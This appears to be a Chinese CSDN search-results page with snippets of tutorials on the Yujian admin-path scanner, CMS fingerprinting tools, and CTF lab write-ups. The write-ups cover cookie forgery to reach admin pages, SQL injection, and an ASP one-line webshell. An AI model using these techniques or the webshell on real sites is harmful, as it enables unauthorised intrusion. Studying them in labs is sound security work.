精华内容
下载资源
问答
  • 2020-11-24 11:21:28

    版本说明:御剑后台扫描珍藏版

    下载地址:安装包放下方网盘里了

    链接:https://pan.baidu.com/s/1Bn7GtWb7AStcjzVahFOjSQ
    提取码:zkaq

    使用环境:windows

    标题工具说明:

    御剑后台扫描珍藏版是T00LS大牛的作品,方便查找用户后台登陆地址,同时也为程序开发人员增加了难度,尽量独特的后台目录结构。

    附带很强大的字典,字典我们也是可以自己修改的,继续增加规则。

    一、御剑后台扫描工具简介:

    1、扫描线程自定义:用户可根据自身电脑的配置来设置调节扫描线程

    2、集合DIR扫描 ASP ASPX PHP JSP MDB数据库 包含所有网站脚本路径扫描

    3、默认探测200 (也就是扫描的网站真实存在的路径文件)

    二、安装

    御剑不用安装,直接下载下来解压,双击“御剑后台扫描工具.exe”即可正常使用。

    三、使用方法

    使用方法也非常简单,只需要在“域名框”输入你要扫描的域名即可!然后点击扫描。

    御剑扫描

    在这里插入图片描述

    给御剑字典增加新规则

    相信大家都知道,有时候御剑自带的字典规则并不能完全的满足我们,因此我们需要手工增加字典规则。

    具体步骤如下:

    1、打开 “D:\御剑后台扫描珍藏版\配置文件”。

    2、打开”PHP.txt”。

    这里主要是以PHP程序的后台配置为主,在此文件你完全可以增加一些其它的PHP类型的后台名字。如果你还想修改ASP、ASPX、JSP等,同理。

    黑客渗透视频教程,扫码免费领

    在这里插入图片描述

    更多相关内容
  • 御剑CMS识别

    2014-05-04 00:01:58
    很不错的CMS识别哦,可以在BIN目录下自己扩展,很好很强大!
  • 包含御剑全版本,cms识别、后台、目录扫描、端口扫描,版本1、2都有,5积分算少的了,收集了很久才凑齐的
  • 浅谈御剑web指纹识别-CMS指纹识别

    千次阅读 2020-08-25 15:30:26
    CMS百度百科的解释:...御剑可以扫描的CMS种类有 1、dedecms 2、discuz 3、drupal 4、empirecms 5、hdwiki 6、joomla 7、phpcms 8、phpwind 9、siteserver 10、wordpress 换句话说,御剑Web指纹识别就只能识别这10中CM

    CMS百度百科的解释:内容管理系统
    站在程序的角度来说(我的专业是计算机软件),其实就是一个快速搭建网站容器
    我今天给大家介绍的是御剑web指纹识别工具,由于专业所致,拿到工具的时候就分析了一下它的文件目录
    可以得到的结论是:
    御剑可以扫描的CMS种类有
    1、dedecms
    2、discuz
    3、drupal
    4、empirecms
    5、hdwiki
    6、joomla
    7、phpcms
    8、phpwind
    9、siteserver
    10、wordpress
    换句话说,御剑Web指纹识别就只能识别这10中CMS
    指纹识别工具的原理是,扫描目标站点的对应的目录特征,目录特征和御剑web指纹工具中数据匹配就可以检测出来

    由于御剑是国产的,所以对国内的CMS识别比较准确,如果你想要检测国外的站点也可以用,但是效果不是很好,除非是一些知名的CMS、国内外通用的那种

    御剑Web指纹识别工具的用法也很简单:
    测试环境:win7 64位(虚拟机)

    然后保存cms.txt,打开御剑指纹识别系统.exe,如图:

    接下来在类于表格的空白地方点击右键,会出现:

    然后点击导入,找到刚刚保存的cms.txt文件,会出现下面这张图片:

    注意,这个时候,你可以选择2种扫描方式“快速识别”或者“详细识别”:

    最后点击开始,会得到如下结果:

    分析:我们一共输入了3个域名,最后只有一个域名检测成功,为什么呢?
    1、bbs.langya.cn(琅琊网) :已经扫描出,CMS类型为discuz 这个我们就不多说了
    2、bbs.tianya.cn(天涯社区) : 我可以明确的告诉你天涯一定是使用了某一个cms,只是网站的设计人员,把cms识别特征给隐藏起来了,这也是一种防御手段
    3、www.taobao.com(淘宝购物网站):我也可以明确告诉你,淘宝网是不可能用CMS的,阿里公司有能力自己开发一个管理系统,且不对外开发,所以这种大型公司不会扫描到CSM的

    总结:1、工具就是工具,我们不能完全的信任,要多项横纵向对比才能得出结论
               2、用CSM建站的原因在于,有些公司没有专门设计网站的人员,用CMS平台可以迅速上线项目,还有些学校、企业网站的管理员本身就不是程序、网站设计人员他们会找外包公司来做自己的网站,这些公司有可能就用了某种CMS,节省了时间、人力成本
    3、所有的CMS管理平台都是有bug的,有的已经被发现,有的还未发现,一旦有一天爆出某种cms版本漏洞,所有使用这些CMS的网站都会收到牵连

    QQ空间日志是我本人写的,有不足之处,请大佬指正,万分感谢
    个性签名:走了很久,路也颠簸,但也学到了很多

    这只是说了御剑扫描工具(基于win平台),我提出几个问题供大家讨论,交流和分享都可以得到技术的提高,请不要吝啬
    问题1:
    CSM还有哪些不错的工具可以使用?
    问题2:
    你知道哪些在线网站可以在线查询CSM?
    问题3:
    你知道的浏览器有哪些插件可以显示CMS信息(例如可以查到的PHP版本、web server、JavaScript库,移动框架、web框架)等等

    展开全文
  • 御剑扫描使用实例

    千次阅读 2022-03-15 15:55:33
    打开御剑扫描工具—>批量扫描后台—>添加 输入网址 选择模式、线程、文件类型等(双击选择) 点击开始扫描 找到两个敏感文件,打开两个地址查看 在http://159.75.16.25/index.php下找到flag...

    使用御剑对http://159.75.16.25进行扫描,扫描出敏感文件,找到文件内的flag值

     

    打开御剑扫描工具—>批量扫描后台—>添加

    watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETkB4QWxzaGFu,size_20,color_FFFFFF,t_70,g_se,x_16 

    输入网址

    watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETkB4QWxzaGFu,size_20,color_FFFFFF,t_70,g_se,x_16 

    选择模式、线程、文件类型等(双击选择)

    watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETkB4QWxzaGFu,size_20,color_FFFFFF,t_70,g_se,x_16 

    点击开始扫描

    watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETkB4QWxzaGFu,size_20,color_FFFFFF,t_70,g_se,x_16 

    找到两个敏感文件,打开两个地址查看

    watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETkB4QWxzaGFu,size_20,color_FFFFFF,t_70,g_se,x_16

    watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETkB4QWxzaGFu,size_20,color_FFFFFF,t_70,g_se,x_16  

    在http://159.75.16.25/index.php下找到flag。

    展开全文
  • 一键发送御剑总后台和玩家后台 by骚动的舞步
  • 信息收集-CMS识别

    千次阅读 2022-02-14 15:11:05
    信息收集-CMS识别

    目录

    一、在线信息收集网站

    1.1:国内

    1.2:国外

    二、CMS识别工具

    2.1:御剑WEB指纹识别

    2.2:TideFinger(潮汐)

    2.3:WhatWeb(kali自带)

    2.4:大宝剑

    2.5:多CMS识别工具

    三、其他识别CMS方法

    3.1:CMS识别指纹(浏览器插件)

    3.2:F12代码JS文件

    3.3:CMS的名称在页面的源代码中指定

    3.4:文件路径

    3.5:网站页脚中的指示

    3.6:链接结构分析

    3.7:管理员登录网址

    3.8:网站特有文件

    3.9:网站MD5指纹

    3.10:一些汇总

    四、CMS漏洞检测工具

    4.1:wordpress

    4.2:Drupal

    4.3:Joomla

    4.4:cmseek

    4.5:几个在线CMS漏洞扫描网站


    一、在线信息收集网站

    1.1:国内

    http://whatweb.bugscaner.com        #识别CMS插件

    https://www.yunsee.cn                    #云悉CMS识别

    http://finger.tidesec.net                   #潮汐指纹识别

    https://www.godeye.vip                  #WEB指纹识别

    1.2:国外

    http://itrack.ru/whatcms                 #CMS识别国外 (俄罗斯)

    https://builtwith.com                      #全面的 CMS 检测

    https://sitereport.netcraft.com      #网站CMS识别

    https://cmsdetect.com                  #CMS识别

    https://rescan.io                            #CMS列表识别

    https://scanwp.net                        #包括插件也监测

    https://www.isitwp.com                #专注WordPress识别

    https://www.codeinwp.com/find-out-what-wordpress-theme-is-that

    二、CMS识别工具

    2.1:御剑WEB指纹识别

    相关链接:http://www.xitongzhijia.net/soft/171203.html  (文件自测)

    2.2:TideFinger(潮汐)

    项目地址:https://github.com/TideSec/TideFinger
    
    安装教程:
    git clone https://github.com/TideSec/TideFinger.git
    cd TideFinger/cd python3/ && pip3 install -r requirements.txt  -i https://mirrors.aliyun.com/pypi/simple/
    
    使用说明:
    python3 TideFinger.py -u http://www.123.com [-p 1] [-m 50] [-t 5] [-d 0]
       -u: 待检测目标URL地址
       -p:指定该选项为1后,说明启用代理检测,请确保代理文件名为proxys_ips.txt,每行一条代理,格式如: 124.225.223.101:80
       -m: 指纹匹配的线程数,不指定时默认为50
       -t: 网站响应超时时间,默认为5秒
       -d: 是否启用目录匹配式指纹探测(会对目标站点发起大量请求),0为不启用,1为启用,默认为不启用

    2.3:WhatWeb(kali自带)

    项目地址:https://github.com/urbanadventurer/WhatWeb.git
    
    安装教程:
    cd WhatWeb && apt install ruby-bundler &&  bundle install &&
    
    使用说明:
    whatweb www.baidu.com

    2.4:大宝剑

    项目地址:https://github.com/wgpsec/DBJ

    2.5:多CMS识别工具

    项目地址:https://github.com/Tuhinshubhra/CMSeek

    三、其他识别CMS方法

    3.1:CMS识别指纹(浏览器插件)

    • WhatRuns

    • Wappalyzer

    3.2:F12代码JS文件

    如果有不知道CMS的网站,可以F12查看网站源代码的JS、CSS等文件,找特殊字符,然后去Github或者红迪(Reddit)网去搜索找到的字符。

    3.3:CMS的名称在页面的源代码中指定

    到您要检查的网站-->按 Ctrl + U 显示页面代码--->在 html 页面上找到前缀为meta name="generator"content=的标签--->引擎名称将在“内容”一词后用引号表示

    3.4:文件路径

    CMS 可以通过代码的典型文件夹及其结构来识别。特别是在指示 js 文件路径的行中。例如,wp-includes 和 wp-content 表明该网站由 Wordpress 提供支持

    3.5:网站页脚中的指示

    CMS 名称有时可以在页脚、底部的小字体、联系信息或额外的公司信息下找到

    3.6:链接结构分析

    如果网站页面的 URL 是在没有使用 CNC 生成器的情况下形成的,您会注意到页面文本中特定于特定 CMS 的部分。

    WordPress 和 Joomla 的特定信息的链接可以在下面的示例中看到

    • WordPress:website_name/р=123

    • Joomla:website_name/index.php?option=com_content&

      task=view&id=12&Itemid=345website_name/content/view/12/345/

    3.7:管理员登录网址

    上使用的 CMS 可以通过查看指向网站管理面板的 URL 来确定。这是 WordPress,例如,如果将 /wp-admin/ 添加到 URL 栏中的域名,则会将您带到带有登录名和密码输入窗口的页面。

    • site_name/wp-admin/ - WordPress

    • site_name/administrator/ - Joomla

    • site_name/admin/ - OpenCart

    • SiteName/user/ - Drupal

    3.8:网站特有文件

    如/templets/default/style/dedecms.css—dedecms

    3.9:网站MD5指纹

    一些网站的特定图片文件、js文件、CSS等静态文件,如favicon.ico、css、logo.ico、js等文件一般不会修改,通过爬虫对这些文件进行抓取并比对md5值,如果和规则库中的Md5一致则说明是同一CMS。这种方式速度比较快,误报率相对低一些,但也不排除有些二次开发的CMS会修改这些文件。

    3.10:一些汇总

    • 网站文件命名规则

    • 返回头的关键字

    • 网页关键字

    • Url特征

    • Meta特征

    • Script特征

    • robots.txt

    • 网站路径特征

    四、CMS漏洞检测工具

    4.1:wordpress

    项目地址:https://github.com/rastating/wordpress-exploit-framework

    项目地址:https://github.com/n00py/WPForce

    项目地址:https://github.com/wpscanteam/wpscan

    描述 :WPScan WordPress 安全扫描器

    使用:kali-->wpscan --url "目标网站"

    4.2:Drupal

    项目地址:https://github.com/SamJoan/droopescan
    项目地址:https://github.com/immunIT/drupwn

    安装教程:
    git clone https://github.com/immunIT/drupwn.git && cd drupwn
    pip3 install -r requirements.txt 
    
    使用说明:./drupwn --mode enum --target "目标地址" 
      --mode MODE     模式枚举|利用
      --target TARGET   要扫描的目标主机名

    4.3:Joomla

    项目地址:https://github.com/OWASP/joomscan

    描述:OWASP Joomla 漏洞扫描程序项目

    安装教程:kali-->apt install joomscan

    使用:joomscan -u "目标"

    4.4:cmseek

    项目地址:https://github.com/Tuhinshubhra/CMSeeK

    安装教程:

    git clone https://github.com/Tuhinshubhra/CMSeeK && cd CMSeeK

    pip3 install -r requirements.txt

    使用说明:python3 cmseek.py -u "目标地址"  

    #######以上三款工具都可kali安装#########

    4.5:几个在线CMS漏洞扫描网站

    https://wpsec.com/                                                          #wordpress专业扫描

    https://wpscan.com/                                                        #wordpress专业扫描

    https://www.malcare.com/wordpress-malware-scan/     #wordpress专业扫描

    https://hackertarget.com/scan-membership/                 #通用-收费

    https://gf.dev/                                                                  #综合测试

    https://pentest-tools.com/                                              #2次免费扫描

    https://www.automox.com/        

    相关参考链接:

    https://zhuanlan.zhihu.com/p/355150689

    https://zhuanlan.zhihu.com/p/402320861

    https://masterxsec.github.io/2017/06/05/CMS识别方法/

    https://www.cnblogs.com/qingchengzi/articles/13533704.html

    还有一些找不到了---巴比Q-- 后台回复MAX获取PDF版本    

    ##################著##################

    本篇文件只是个人的收集汇总--如有侵犯联系作者给予删除

    团队微信公众号:MAX安全团队

    展开全文
  • 这是上周hw中遇到的一个cms,记录一下,防止以后遇到忘记利用点(手动狗头) 0x01介绍 PageAdmin Cms是一款基于asp.net mvc开发的自助建站系统,于2008年发布,从最开始的2.0版本到目前的4.0版本,强大的后台管理...
  • 这是上周hw中遇到的一个cms,记录一下,防止以后遇到忘记利用点(手动狗头) 0x01介绍 PageAdmin Cms是一款基于asp.net mvc开发的自助建站系统,于2008年发布,从最开始的2.0版本到目前的4.0版本,强大的后台...
  • 510cms漏洞练习

    千次阅读 2022-04-17 21:08:15
    510cms漏洞练习
  • CMS指纹识别,了解目标网站用了什么框架,什么数据库,什么代理,充分了解目标后可以去查一些nday来进行攻击
  • 御剑后台扫描工具 ,BurpSuite, 菜刀、蚁剑 信息收集 靶场地址 后台地址 先扫下敏感目录,这是后面才找来的工具,不然时间省下不少,后台是自己猜的,在模版文件路径那里白搞了半天(菜~): 很明显,本站用的是...
  • 御剑WEB指纹识别

    2013-06-21 16:32:31
    御剑WEB指纹识别,作者新开发的,速度非常快。 识别CMS指纹很给力!
  • 渗透测试之网站cms识别大法汇总

    千次阅读 2021-04-13 16:56:35
    windows中御剑–指纹识别 kali下whatweb 云悉(http://www.yunsee.cn/finger.html)相信大家都知道,但其库总有限。 还有个网站:http://whatweb.bugscaner.com/look/ 再给大家介绍kali自带的一款工具— whatweb 一...
  • 御剑web指纹识别程序是御剑大神开发的一款CMS指纹识别小工具,该程序由.NET 2.0框架开发,配置灵活、支持自定义关键字和正则匹配两种模式、使用起来简洁、体验良好。在指纹命中方面表现不错、识别速度很快、但目前...
  • 被动信息收集----指纹识别(CMS识别)

    千次阅读 2019-08-24 23:45:19
    而对于每个网站来说,他们也具有可标识性,我们一般通过网站CMS识别、计算机操作系统识别以及web容器识别来标识网站。 2.指纹识别的目的 在渗透测试中,对目标服务器进行指纹识别是非常有必要的,因为只有识别出...
  • 一些cms渗透的思路

    千次阅读 2017-07-12 16:45:29
    一些cms渗透的思路
  • 信息收集之——CMS指纹识别

    千次阅读 2020-05-13 20:40:44
    这里所指的是网站CMS指纹识别、计算机操作系统及Web容器的指纹识别等。 ​ 在渗透测试中,对目标服务器进行指纹识别是相当有必要的,因为只有识别出相应的Web容器或者CMS,才能查找与其相关的漏洞,然后才能进行...
  • CMS指纹识别技术及应用

    千次阅读 2018-05-11 12:11:34
    CMS指纹识别技术及应用simeon在web***过程中,对目标网站的指纹识别比较关键,通过工具或者手工来识别CMS系统是自建还是二次开发,还是直接使用公开的CMS程序至关重要。通过获取的这些信息来决定后续***的思路和策略...
  • 拿到网站 简单观察后发现url区域存在传参 简单测试找到存在注入的界面(此网站多处网址存在注入) 这里我们通过输入一个单引号找到“企业介绍”—>...得到数据库名为“510cms” 然后指定该数据库...
  • 新云CMS 4.0.0 SP1 三.漏洞复现 1.使用御剑对域名进行探测 登录网址为http://219.153.49.228/login.asp 2.注册用户 在“密码问题”插入一句话木马 一句话木马为: <% execute request(“a”)%>” 经过...
  • 2.打开靶场,使用御剑扫描,发现一个/admin/的后台地址页面 3.通过资料了解到这个php通过校验访问的cookie,使用cookie edit修改cookie,添加admin_name,value随意 4.访问/admin/cms_admin.php,进入后台 5.拉倒...
  • 靶场: ... 背景介绍 某日工程师发现一网站后台,... 实训目标 ...1、了解cookie的含义;...1、御剑扫描 找到后台登录目录: 2、用cookie edit 修改cookie,添加admin_name,value任意 3、访问/admin,再访问/admin/cm
  • 御剑扫出admin登录后台,出现一个flag 基本信息:有一个flag 上传一句话木马图片:抓包修改为php,蚁剑或菜刀连接 有个flag.php文件 信息泄露包括源码泄露,配置等 命令执行漏洞:(非代码执行) 应用程序源代码功能...
  • 御剑指纹识别

    2019-01-29 15:06:00
    御剑是一款c#编写的指纹识别软件 通过识别一些特征能够新手判断网站的cms比如拿博客园做例子 用的是腾讯云服务器 当然也可以用appprint可以对单个ip和域名进行容器识别 转载于:...
  • CMS系统漏洞分析溯源(第6题) 一.解题思路 得到用户名之后爆破密码登录后台,再写入一句话木马 二.操作步骤 1.御剑扫描 可以看到后台登录界面为http://ip:port/servlets/ 2.后台登录: 已知用户名为mozhe777 登录...
  • hjr-CMS注入

    2017-01-17 17:46:57
    下载个可以根据网址+字典测试联通的软件,如’御剑’。 谷歌搜索 site : www.xxx.com inurl : admin|manager|system|。 网站克隆 类似爬虫,根据种子url+js脚本,下载网站全部资源,如 ‘秋秋网页下载器’。 ...
  • 又是一道cms的题,打开御剑一通乱扫,发现后台登录地址,访问一看妥妥的齐博cms 记得以前很久以前利用一个注入通用漏洞,这里我贴上链接,里面有原理与利用方法详细说明: 齐博cms_userinfo注入 按照这个...
  • dedecms 御剑扫描后台 找到漏洞 寻找EXP 直接搜索版本可以知道漏洞 通过exploit-db.com 搜索漏洞编号 kali wpscan --url PHP弱类型赛题 字符串与整数比较会进行类型转换 就是1a== 1 md5 0e缺陷 开头的哈希值 字符串...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 924
精华内容 369
关键字:

御剑cms